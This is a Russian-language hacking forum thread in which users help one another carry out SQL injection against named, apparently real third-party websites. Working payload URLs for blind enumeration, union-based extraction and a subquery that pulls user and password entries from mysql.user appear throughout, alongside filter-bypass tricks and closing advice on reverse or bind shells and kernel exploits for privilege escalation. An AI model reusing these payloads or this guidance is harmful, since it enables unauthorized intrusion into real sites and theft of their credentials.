Ты закрываешь коментом свой запрос вот он и проходит, вобше уязвимый параметр у нас в limit: 2Byrger это не слепая, переводить можно и так(php) echo "0x".bin2hex("здесь пишем чего хотим перевисти");
Для тех, кто не знает кто такой даниельдефо - погуглите =) А инъекция после лимита возможна. Более чем )
s_p_a_m Там INSERT http://www.zork.name/?view=2)+and+substring(version(),1,1)=(5 вот перебор, если нужен http://www.zork.name/?view=2)+AND+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1)))<(53 =============================== Давай посмотрим реализацию Например тут: http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140' http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140,2--+ Ну или твой вариант с удовольствием посмотрю. С "ORDER BY", что-бы всё как положено
Если в запросе есть ордей бай то нельзя. Ну мне нужно было конкретизировать, сори что ввел вас в заблуждение
http://pastebin.com/m19eaa637 Переменная form_number не проходит фильтрацию...Но я так понял,что даже если она и уязвима,то вывода не будет ? PHP: $result = mysql_query("INSERT INTO Users (firstname,lastname,school_id,description,email,username,password) VALUES ('$firstname','$lastname','$school_id','$form_number','$email','$username', Password('$password'))"); В school_id только XSS... В остальных переменных режутся хтмл и пхп strip_tags() функцией...не знаю,что и делать.Что касается проверки длины полей хтмл формы,то проверка идёт только на уровне приложения,а сервер отдыхает...Хотя бы поле password. Может,кто найдёт здесь sql inj или щё что-нибудь интересное ? ПЫСЫ: Если что, то приму минусы в подарок,если написал не туда,куда полагается...
HTML: http://www.gmpr.ru/news_item.php?id=699' А дальше не воспринимает.... HTML: http://www.gmpr.ru/news_item.php?id=699+group+by+400--
если $form_number уязвима и MySQL поддерживает подзапросы + кавычки не слешируються то можешь зделать своеобразный вывод в пользовательских профиле(естественно это имеет смысл еслу тебя есть доступ к данным пользователя), то есть что то типо такого: $form_number = 1',(select concat_ws(0x3a,user,password,host) from mysql.user limit 1),'dodik','pass' /* потом ишешь пользователя dodik и по идее у него в мыли будет лежать наш подзапрос.
там же видно по ошибке что переменая вставляеться в кавычке: PHP: http://www.gmpr.ru/news_item.php?id=699123123'+union+select+1,2,concat_ws(0x3A,user(),@@version,database()),4,5,6,7,8,9,10--+
Если в ошибки от скули приходит с + то как поставить пробел? PHP: ov/'+group+by+1--/' И она не воспринимает --
Когда в MySQL используешь комент -- то после него надо ставить пробел --+, судя по всему скуля у тебя в чпу можешь попробывать использывать /**/ вместо пробелов, а в качестве комента закрываюшего оставшийся запрос - #( беда с # в том что браузер может воспринять # как анкор поэтому обычно вставляют %23 ) и если у тебя логика(считай регулярка) чпу требует что бы переменная которая вставляеться в запрос находилась между // то у тебя например когда ты делаешь вот так : /**/order/**/by/**/1#/(потому как пробелы не urldecode то и %23 наверно так и останиться %23) в качестве значения переменой пойдет ** в запрос, можешь попробывать %20 вместо пробелов(хотя если производилось urldecode запроса то и + могли бы пройти), вообшем с чпу не всегда все просто и понятно, единственым решением являеться прямое обрашения к скрипту с передачей ему нужных значений как это делает чпу что не всегда возможно по ряду причин.
PHP: ov/'%20%23/**/+--+group+by+1--+/' PHP: ov/'+group+by+1%23/' Вообще не как не пускает....а запрос выгледит так.. PHP: SELECT `ID`, `Name` FROM `menu` WHERE roup_ID` = '2' AND `Active` = '1' AND `URL` = '/arti....erov/'/**/group/**/by/**/1+--+/' В ошибке он ругается на /' тоесть похоже что запросе не прерывется (MySQL стоит...)
ну ты же видешь что после -- у нас идет + а должен быть пробел, попробуй так '/**/group/**/by/**/1/*/, и если подерживаеться union - '/**/union/**/select/**/1,2/*/ может последний слеш и не нужен, судя по запросу если он действительно полный то можно обойтись и вообше без коментов '/**/union/**/select/**/1,2/**/'/ SELECT `ID`, `Name` FROM `menu` WHERE roup_ID` = '2' AND `Active` = '1' AND `URL` = '/arti....erov/'/**/union/**/select/**/1,2/**/'/' а вообше вылаживай линк или в пм раз сайт пентагона под прицелом.
не sql injec так же как и php и asp sql injec - проблема не интерпритации языков а проблема запросов (в основном) google рулит
2 inperous Не хватает прав. Тут как вариант - бекконект или бинд шелл - локальный сплойт что бы поднятся до рута
id - покажет права uname -a - версию ядра google.com - ищи сплойты под версию ядра есть много способов по поднятию прав. один из них - https://forum.antichat.ru/nextoldesttothread17443.html
